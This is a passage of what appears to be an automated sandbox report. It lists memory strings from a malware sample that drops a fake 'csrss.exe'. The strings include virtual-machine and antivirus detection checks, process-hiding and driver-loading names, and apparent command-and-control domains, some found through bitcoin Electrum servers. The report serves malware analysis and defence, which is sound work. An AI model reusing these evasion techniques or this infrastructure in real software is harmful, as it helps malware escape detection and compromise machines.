          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptyemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflatehttp2client=0if-none-matchimage/svg+xmlinvalid UTF-8invalid base kernel32.dllkey expansionlast-modifiedlevel 3 resetload64 failedlogs endpointmaster secretname is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparse URL: %wparsing time powrprof.dllprl_tools.exerebooting nowscvg: inuse: servers countservice statesigner is nilsmb start: %wsocks connectsrmount errorstill in listtimer expiredtrailing datatriggerRatio=unimplementedunsupported: user canceledvalue method verifier hashverifier hostvirtualpc: %wxadd64 failedxchg64 failed}
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: is unavailable()<>@,;:\"/[]?=0601021504Z0700476837158203125: cannot parse :ValidateLabels; SameSite=None<invalid Value>ASCII_Hex_DigitAccept-EncodingAccept-LanguageAddDllDirectoryBelowExactAboveCLSIDFromProgIDCLSIDFromStringCreateHardLinkWCreateWindowExWDefaultInstanceDelegateExecuteDeviceIoControlDuplicateHandleEfiGuardDxe.efiElectrumX 1.2.1Failed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGateway TimeoutGetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaIdempotency-KeyImpersonateSelfInstall failureIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
          Source: jkDmft1Qoe.exe, 00000004.00000002.681186282.00000000118BE000.00000004.00000001.sdmpBinary or memory string: ?advapi32.dllRegQueryValueExWFirewallDefenderhttps://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMicrosoft Windows 10 ProOSArchitecturePatchTimeARO92HUGOpenProcessTokenGetTokenInformationS-1-5-18c:\windows\rss\csrss.exeCreateToolhelp32Snapshot[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compressionsmartscreen.exeShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exeVBoxService\\.\VBoxGuest\\.\VBoxTrayIPC[System Process]vgauthservice.exeSystemvgauthservice.exeRegistryvgauthservice.exesmss.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compressioncDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exeBackgroundTransferHost.exebackgroundtransferhost.exejkDmft1Qoe.exeTrustedInstaller.exetrustedinstaller.exeUpdateNotificationMgr.exeupdatenotificationmgr.exejkDmft1Qoe.exe[System Process]SystemRegistrysmss.exeShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exeApplicationFrameHost.exeapplicationframehost.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exeBackgroundTransferHost.exebackgroundtransferhost.exejkDmft1Qoe.exeTrustedInstaller.exetrustedinstaller.exeUpdateNotifi
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: (MISSING)(unknown)+infinity, newval=, oldval=-07:00:00-infinity/api/cdn?/api/poll244140625: status=; Domain=Accuracy(AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]atomicor8b.ooze.ccbad indirbillowingbroadcastbus errorbutterflychallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0ecdsa.netempty urlfn.48.orgfodhelperfork/execfuncargs(gdi32.dllimage/gifimage/pnginterfaceinterruptipv6-icmplingeringlocalhostmSpanDeadmSpanFreemulticastnew tokennil errorntdll.dllole32.dllomitemptypanicwaitpatch.exepclmulqdqprecisionprintableprotocol psapi.dllraw-writereboot inrecover: reflect: resonancerwxrwxrwxscheduledsmb startsnowflakesparklingsucceededtask %+v
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
          Source: jkDmft1Qoe.exe, 00000004.00000002.681293770.00000000118DC000.00000004.00000001.sdmpBinary or memory string: vgauthservice.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.exevgauthservice.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.exevgauthservice.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.exevgauthservice.exevgauthservice.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exevgauthservice.exevgauthservice.exebackgroundTaskHost.exebackgroundtaskhost.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exebackgroundTaskHost.exebackgroundtaskhost.exevgauthservice.exeBackgroundTransferHost.exebackgroundtransferhost.exevgauthservice.exejkDmft1Qoe.exevgauthservice.exeTrustedInstaller.exetrustedinstaller.exevgauthservice.exeUpdateNotificationMgr.exeupdatenotificationmgr.exevgauthservice.exejkDmft1Qoe.exevgauthservice.exevmmemctlvmusbmousevmx_svga\\.\HGFS\\.\vmci[System Process]SystemRegistrysmss.exesmartscreen.exeShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exeApplicationFrameHost.exeapplicationframehost.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compressionsmartscreen.exemsvmmouf[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exesmartscreen.exeShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.exe_NewEnumC:\Windows\rss\csrss.exeC:\Windows\Sysnative\cmd.exeGetFileAttributesExWC:\Windows\Sysnative\cmd.exeGetEnvironmentStringsWCOMPUTERNAME=computerHOMEPATH=\Windows\system32NUMBER_OF_PROCESSORS=2PROCESSOR_ARCHITECTURE=x86PROCESSOR_ARCHITEW6432=AMD64PROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramW6432=C:\Program FilesPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Windows\TEMPTMP=C:\Windows\TEMPUSERDOMAIN=WORKGROUPUSERNAME=computer$windir=C:\WindowsFreeEnvironmentStringsWcommonprogramfilescommonprogramfiles(x86)commonprogramw6432number_of_processorsprocessor_architectureprocessor_architew6432processor_identifierprocessor_revisionprogramfiles(x86)GetCurrentProcessGetExitCodeProcess5J
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad RST markerbad allocCountbad record MACbad span statebad stack sizebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removedexit status -1file too largefinalizer waitgcstoptheworldgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedlookup TXT: %wmemprofilerateneed more datanil elem type!no module datano such deviceparse cert: %wprotocol errorread certs: %wreport_id is 0runtime: base=runtime: full=s.allocCount= semaRoot queueserver.versionstack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytimeEndPeriodtoo many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmpBinary or memory string: systemvboxtray.exe
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s*%d%s/%s%s:%d%s=%s%v-%v&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm.webp156253.2.2500015000250003500045000550006560015600278125:***@:path<nil>AdlamAprilAttr(BamumBatakBuhidCall CountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageP-224P-256P-384P-521PGDSERangeRealmRunicSTermTakriTamilTypeAUUID=\u202allowarraybad nblackbrookchdirclosecloudcsrssdreamemptyfalsefaultfieldfloatfrostgcinggladegrassgreenhttpsimap2imap3imapsint16int32int64matchmistymkdirmonthmuddynightntohspanicpaperparsepgdsepop3sproudquietrangeriverrmdirroughrouterune sdsetshapesleepslicesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB)
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: acceptactiveautumnbitterbreezebrokenchan<-cherryclosedcookiedivinedomaindwarf.efenceempty exec: expectfloralflowerforestfrostygopherhangupheaderhiddenip+netkilledlistenlittlelivelymeadowminutenumberobjectpopcntpurplereadatreasonremoverenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> dying= flags= len=%d locks= m->g0= nmsys= s=nil
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: main.isRunningInsideVMWare
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: entersyscallexit status found av: %sgcpacertracegetaddrinfowgot TI tokenguid_machinehost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wpointtopointproxyconnectreflect.Copyreleasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released
          Source: jkDmft1Qoe.exe, 00000004.00000002.679881756.000000001180A000.00000004.00000001.sdmpBinary or memory string: get data directory entry: GetTimeZoneInformationW. Europe Standard Time2021/10/18 08:01:21 C:\Users\user\DesktopSetCurrentDirectoryWole32.dllApplicationFrameHost.exeapplicationframehost.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exeBackgroundTransferHost.exebackgroundtransferhost.exejkDmft1Qoe.exeTrustedInstaller.exetrustedinstaller.exeUpdateNotificationMgr.exeupdatenotificationmgr.exejkDmft1Qoe.exeVBoxWddmCloseServiceHandleVBoxMouseVBoxGuestfontdrvhost.exevgauthservice.exevgauthservice.exefontdrvhost.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exedwm.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeMemory Compressionmemory compressionvgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exesmartscreen.exevgauthservice.exevgauthservice.exevgauthservice.exeShellExperienceHost.exeshellexperiencehost.exevgauthservice.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exevgauthservice.exevgauthservice.exeSgrmBroker.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeApplicationFrameHost.exeapplicationframehost.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.exevgauthservice.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.exevgauthservice.execDkZNYLkFjxTdwQUzr.execdkznylkfjxtdwquzr.exevgauthservice.exe
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseFloatPhoenicianProcessingPulseEventRST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8casgstatuscmd is nilcomplex128connectiondnsapi.dlldsefix.exedwarf.Attre.keff.orgexitThreadexp mastergetsockoptgoroutine http_proxyimage/jpegimage/webpinvalidptrkeep-alivemSpanInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc()
          Source: jkDmft1Qoe.exe, 00000004.00000002.679881756.000000001180A000.00000004.00000001.sdmpBinary or memory string: vmmousevmusb$
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcompaign_idcreated by crypt32.dlldnsmessage.e2.keff.orgembedded/%sfile existsfinal tokenfloat32nan2float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknamehttps_proxyi/o timeoutlocal errorlost mcachemSpanManualmethodargs(mswsock.dllnext servernil contextorannis.comparse errorprocess: %sraw-controlreflect.Setretry-afterruntime: P runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writetaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion=183wininet.dllwup_process (sensitive) [recovered] allocCount found at *( gcscandone m->gsignal= minTrigger= nDataRoots= nSpanRoots= pages/byte
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> ancientany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scrimsonderivedexpiresfallingfeatherfireflyfloat32float64gctraceglitterhttp://id is 0invalidkdu.exelookup max-agemorningnil keynop -> number panic: patientrefererrefreshrunningserial:server=signal silencesvc_versyscallthundertraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwsarecvwsasendwup_verxen: %wxennet6 data=%q etypes goal
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmpBinary or memory string: vmsrvc.exe
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmpBinary or memory string: vboxservice.exe
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: throbbingunderflowunhandledw3m/0.5.1wanderingwaterfallweatheredwebsocketxenevtchn} stack=[ MB goal, actual
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmpBinary or memory string: vboxtray.exe
          Source: jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: unknown network workbuf is emptywww-authenticate initialHeapLive= spinningthreads=%%!%c(big.Int=%s)0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method ; SameSite=StrictAdjustTokenGroupsCOMPRESSION_ERRORCanSet() is falseCertFindExtensionCreateStdDispatchCryptDecodeObjectDnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5ReadProcessMemoryRegLoadMUIStringWSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcouldn't registercpu name is emptydecryption faileddiscover-electrumelectrumx.soon.itembedded/%s32.sysembedded/%s64.sysenode.duckdns.orgentersyscallblockerbium1.sytes.netexec format errorexec: not startedexponent overflowfile URL is emptyfractional secondgp.waiting != nilhandshake failureif-modified-sinceillegal parameterimpersonation: %win string literalindex > windowEndinteger too largeinvalid bit size invalid stream IDkey align too biglibwww-perl/5.820locked m0 woke upmark - bad statusmarkBits overflowmissing closing )missing closing ]missing extensionnil resource bodyno data availablenotetsleepg on g0permission deniedpseudo-device: %sread revision: %wrecords are emptyreflect.Value.Capreflect.Value.Intreflect.Value.Lenreflect: New(nil)reflect: call of runtime.newosprocruntime: a.base= runtime: b.base= runtime: nameOff runtime: next_gc=runtime: pointer runtime: textOff runtime: typeOff scanobject n == 0seek at 0x%0x: %wseeker can't seekselect (no cases)stack: frame={sp:thread exhaustiontransfer-encodingtruncated headersunknown caller pcwait for GC cyclewine_get_version
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaClass(CommonCookieCopticDELETEExpectFltMgrFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWinmon[]byte\??\%s\csrss\ufffd
          Source: jkDmft1Qoe.exe, 00000004.00000002.679881756.000000001180A000.00000004.00000001.sdmpBinary or memory string: dllhost.exesvchost.exejkdmft1qoe.exejkdmft1qoe.exevmci$
          Source: jkDmft1Qoe.exe, 00000004.00000002.679881756.000000001180A000.00000004.00000001.sdmpBinary or memory string: vmhgfs$
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmpBinary or memory string: [system process]vboxtray.exe
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmpBinary or memory string: smss.execsrss.exewininit.execsrss.exeservices.exewinlogon.exelsass.execsrss.exesharedintapp.exeservices.exesharedintapp.exewinlogon.exesharedintapp.exelsass.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exedwm.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exespoolsv.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.execonhost.exesharedintapp.exeUsoClient.exeusoclient.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exeHxTsr.exehxtsr.exesharedintapp.exedllhost.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exejkdmft1qoe.exesharedintapp.exesharedintapp.exesharedintapp.exejkdmft1qoe.exesharedintapp.exe[system process]vmsrvc.exevmusrvc.exeSystemsystemvmsrvc.exevmusrvc.exeRegistryregistry
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmpBinary or memory string: 